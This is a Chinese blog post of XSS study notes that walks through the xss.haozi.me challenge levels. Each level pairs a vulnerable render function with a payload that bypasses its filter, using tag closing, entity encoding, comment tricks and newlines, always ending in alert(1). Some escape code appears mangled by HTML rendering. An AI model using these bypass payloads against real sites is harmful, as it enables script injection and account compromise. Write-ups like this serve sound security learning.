XSS 学习

记录和总结XSS攻击学习过程。

1 知识点

htmlspecialchars()  #把预定义的字符 "<" （小于）和 ">" （大于）转换为 HTML 实体
#  预定义的字符是：
# & （和号）成为 &
# " （双引号）成为 "
# ' （单引号）成为 '
# < （小于）成为 <
# > （大于）成为 >

浏览器会先解析html,再解析js,因此对于<img src=x onerror="console.error('&#39;);alert(&#39;1')">这种格式的代码，waf实际无用。

2 靶场练习

靶场地址：https://xss.haozi.me/

解题参考：http://www.lmxspace.com/2018/08/09/xss-%E6%8C%91%E6%88%98%E8%B5%9B/

0x00

// 第一题比较简单 直接输出注入的代码
function render (input) {
  return '<div>' + input + '</div>'
}

# Payload:
<script>alert(1);</script>

0x01

// 因为textarea中间的字符串只会被当场文本显示而不会执行，所以需要先闭合textarea标签
function render (input) {
  return '<textarea>' + input + '</textarea>'
}

# Payload:
</textarea><script>alert(1);</script>

0x02

// 我们输入的值会作为标签的属性，所以我们先用"闭合value属性。
// 然后使用onmousemove属性进行xss，鼠标滑过就可以触发
// 也曾尝试autofocus onfocus="alert(1)" 但是没有成功
function render (input) {
  return '<input type="name" value="' + input + '">'
}

# Payload:
" onmousemove="alert(1)

0x03

// 题目中用正则表达式过滤了（），但是可以采用反引号`绕过
function render (input) {
  const stripBracketsRe = /[()]/g
  input = input.replace(stripBracketsRe, '')
  return input
}

# Payload:
<script>alert`1`</script>

0x04

// 题目中用正则表达式过滤了（）和反引号，使用svg标签，<svg>标签中可以直接执行实体字符。
function render (input) {
  const stripBracketsRe = /[()`]/g
  input = input.replace(stripBracketsRe, '')
  return input
}

# Payload1:
<svg><script>alert&#40;1&#41;</script>
# Payload2:
<img src=1 onerror=alert&#40;1&#41;>

0x05

// 题目中用正则表达式过滤了-->。
// html注释支持以下两种方式：
// <!-- xxx -->
// <!- xxx -!> <!— 以！开头，以！结尾对称注释的方式 —!>
function render (input) {
  input = input.replace(/-->/g, '😂')
  return '<!-- ' + input + ' -->'
}

# Payload:
--!><script>alert(1)</script><!--

0x06

// 题目中用正则表达式过滤了auto/on/>
// 正则表达式中的. 不能匹配行末换行 所以可以用换行绕过

function render (input) {
  input = input.replace(/auto|on.*=|>/ig, '_')
  return `<input value=1 ${input} type="text">`
}

# Payload:
onmousemove
="alert(1)"

0x07

// 题目中用正则表达式过滤了一个以<>包裹的字符串
// 利用浏览器的容错性，不写>

function render (input) {
  const stripTagsRe = /<\/?[^>]+>/gi

  input = input.replace(stripTagsRe, '')
  return `<article>${input}</article>`
}

# Payload:
<svg onload="alert(1)"

0x08

// 我们的输入出现在style标签里 题目中用正则表达式过滤了</style> 防止我们闭合标签
// 可以利用换行和空格绕过这个正则

function render (src) {
  src = src.replace(/<\/style>/ig, '/* \u574F\u4EBA */')
  return `
    <style>
      ${src}
    </style>
  `
}

# Payload:
</style > <svg onload="alert(1)">

0x09

// 题目中要求payload需要包含https://www.segmentfault.com前缀。
// 此外没有其他保护所以我们只需要通过onload属性进行xss

function render (input) {
  let domainRe = /^https?:\/\/www\.segmentfault\.com/
  if (domainRe.test(input)) {
    return `<script src="${input}"></script>`
  }
  return 'Invalid URL'
}

# Payload:
https://www.segmentfault.com" onload="alert(1)

0x0A

// 题目中做了非常全面的限制，需要引用外部js

function render (input) {
  function escapeHtml(s) {
    return s.replace(/&/g, '&')
            .replace(/'/g, ''')
            .replace(/"/g, '"')
            .replace(/</g, '&lt;')
            .replace(/>/g, '&gt;')
            .replace(/\//g, '&#x2f')
  }

  const domainRe = /^https?:\/\/www\.segmentfault\.com/
  if (domainRe.test(input)) {
    return `<script src="${escapeHtml(input)}"></script>`
  }
  return 'Invalid URL'
}

# Payload:
https://www.segmentfault.com" onload="alert(1)

0x0B

// 题目中将我们的输入全部转为了大写
// 这里需要知道的前置知识是
// html标签大小写无影响；
// js严格区分大小写。
// 所以我们利用html标签来操作，然后对js进行编码

function render (input) {
  input = input.toUpperCase()
  return `<h1>${input}</h1>`
}

# Payload:
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;&#40;1&#41;>

0x0C

// 与上一题相同 多过滤了script字段 但是对于我们的payload没有影响

function render (input) {
  input = input.replace(/script/ig, '')
  input = input.toUpperCase()
  return '<h1>' + input + '</h1>'
}

# Payload:
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;&#40;1&#41;>

0x0D

// 用回车跳出注释 再用-->把后面的）注释掉

function render (input) {
  input = input.replace(/[</"']/g, '')
  return `
    <script>
          // alert('${input}')
    </script>
  `
}

# Payload:

alert(1);
-->

0x0E

// 用回车跳出注释 再用-->把后面的）注释掉

function render (input) {
  input = input.replace(/[</"']/g, '')
  return `
    <script>
          // alert('${input}')
    </script>
  `
}

# Payload:

alert(1);
-->

0x0F

// 看上去和0A一样，这种单字符的替换已经无法绕过。
// 但是因为这里的注入点在onerror内部，所以html的实体编码其实对这部分js代码无影响。

function render (input) {
  function escapeHtml(s) {
    return s.replace(/&/g, '&')
            .replace(/'/g, ''')
            .replace(/"/g, '"')
            .replace(/</g, '&lt;')
            .replace(/>/g, '&gt;')
            .replace(/\//g, '&#x2f;')
  }
  return `<img src onerror="console.error('${escapeHtml(input)}')">`
}

# Payload:
');alert('1

0x10

// 没有保护措施，且注入点在script标签内，直接注入

function render (input) {
  return `
<script>
  window.data = ${input}
</script>
  `
}

# Payload:

alert('1');

0x11

// 虽然看似过滤的非常严格，但是"引入两个\\刚好可以把引号闭合，所以依旧可以成功

// from alf.nu
function render (s) {
  function escapeJs (s) {
    return String(s)
            .replace(/\\/g, '\\\\')
            .replace(/'/g, '\\\'')
            .replace(/"/g, '\\"')
            .replace(/`/g, '\\`')
            .replace(/</g, '\\74')
            .replace(/>/g, '\\76')
            .replace(/\//g, '\\/')
            .replace(/\n/g, '\\n')
            .replace(/\r/g, '\\r')
            .replace(/\t/g, '\\t')
            .replace(/\f/g, '\\f')
            .replace(/\v/g, '\\v')
            // .replace(/\b/g, '\\b')
            .replace(/\0/g, '\\0')
  }
  s = escapeJs(s)
  return `
<script>
  var url = 'javascript:console.log("${s}")'
  var a = document.createElement('a')
  a.href = url
  document.body.appendChild(a)
  a.click()
</script>
`
}

# Payload:
");alert(1);//

0x12

// 用回车跳出注释 再用-->把后面的）注释掉

// from alf.nu
function escape (s) {
  s = s.replace(/"/g, '\\"')
  return '<script>console.log("' + s + '");</script>'
}

# Payload:
\");alert(1)//

通关截图

赏

谢谢你请我吃糖果